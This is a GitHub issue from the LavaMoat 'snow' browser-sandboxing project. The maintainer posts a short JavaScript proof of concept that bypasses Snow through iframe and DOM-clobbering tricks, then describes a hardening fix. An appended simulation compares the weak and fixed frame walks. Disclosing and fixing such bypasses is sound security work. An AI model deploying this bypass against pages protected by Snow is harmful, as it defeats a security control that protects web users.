LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!
https://lavamoat.github.io/snow/demo/
MIT License

Implement is-cross-origin internally so it doesn't throw #111

Closed weizman closed 1 year ago

weizman commented 1 year ago

This allowed a Snow bypass:

(function(){
    // Two iframes: the first is attached to the document right away, the second only later.
    const ifr = document.createElement('iframe');
    const ifr2 = document.createElement('iframe');
    document.body.appendChild(ifr);
    // A div whose id is the numeric string '0'.
    const div = document.createElement('div');
    div.id='0';
    // After the second iframe has been attached, use its window's alert on top.
    setTimeout(() => { ifr2.contentWindow.alert.call(top,1); }, 500);
    // Insert the div into the first iframe's document (ignore failures).
    try { ifr.contentWindow.document.body.appendChild(div); } catch {}
    document.body.appendChild(ifr2);
}());
weizman commented 1 year ago

Update: #111 was not strong enough; the isWindow function could have been easily bypassed. e2cf42e introduces a hardening fix for that (instead of walking the frames array until there's nothing in there, walk it according to the length prop; that way we only walk through windows and not through windows + clobbered elements).
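A simulation of the two walks contrasted in the comment above, added here as an example and not taken from Snow's code or the e2cf42e commit. `FakeWindow`, `FakeElement`, `buildFrames` and the two walk functions are constructed stand-ins: the frames-like object is built by hand so the example runs outside a browser, and a non-window object is placed at the first index past `length` to stand in for a clobbered slot.

```javascript
// Added example (not Snow's code): contrast a frames walk that stops at the
// first empty slot with one bounded by the `length` property, using a
// constructed frames-like object instead of a real browser `window.frames`.

// Constructed stand-ins for a child window and for a DOM element.
class FakeWindow {
  constructor(name) {
    this.name = name;
    this.window = this; // real Window objects satisfy `w.window === w`
  }
}
class FakeElement {
  constructor(id) {
    this.id = id;
    this.tagName = 'DIV';
  }
}

// Build a frames-like object: `length` counts only the real child windows.
// If `clobber` is given it occupies the index right after the last window,
// modelling a slot that is truthy but is not a window.
function buildFrames(windows, clobber) {
  const frames = { length: windows.length };
  windows.forEach((w, i) => { frames[i] = w; });
  if (clobber) frames[windows.length] = clobber;
  return frames;
}

// Weak walk: keeps going while the slot is truthy, so it runs past the
// real windows into whatever else sits at the next index.
function walkUntilEmpty(frames) {
  const seen = [];
  for (let i = 0; frames[i]; i++) seen.push(frames[i]);
  return seen;
}

// Hardened walk: bounded by `length`, so only indices that the frames
// collection itself reports as windows are visited.
function walkByLength(frames) {
  const seen = [];
  for (let i = 0; i < frames.length; i++) seen.push(frames[i]);
  return seen;
}

// Membership checks built on each walk: "is this object one of the windows?"
function isWindowWeak(candidate, frames) {
  return walkUntilEmpty(frames).includes(candidate);
}
function isWindowHardened(candidate, frames) {
  return walkByLength(frames).includes(candidate);
}

// Stand-alone demonstration: two windows plus a clobbering element.
function demonstrate() {
  const w0 = new FakeWindow('frame0');
  const w1 = new FakeWindow('frame1');
  const div = new FakeElement('0');
  const frames = buildFrames([w0, w1], div);
  return {
    weakVisits: walkUntilEmpty(frames).length,        // 3: both windows and the div
    hardenedVisits: walkByLength(frames).length,      // 2: only the windows
    weakTreatsDivAsWindow: isWindowWeak(div, frames), // true
    hardenedTreatsDivAsWindow: isWindowHardened(div, frames), // false
  };
}

console.log(demonstrate());
```

The point of the bounded walk is that the termination condition no longer depends on what happens to be stored at the next index, so an attacker-controlled object sitting there is never mistaken for a window.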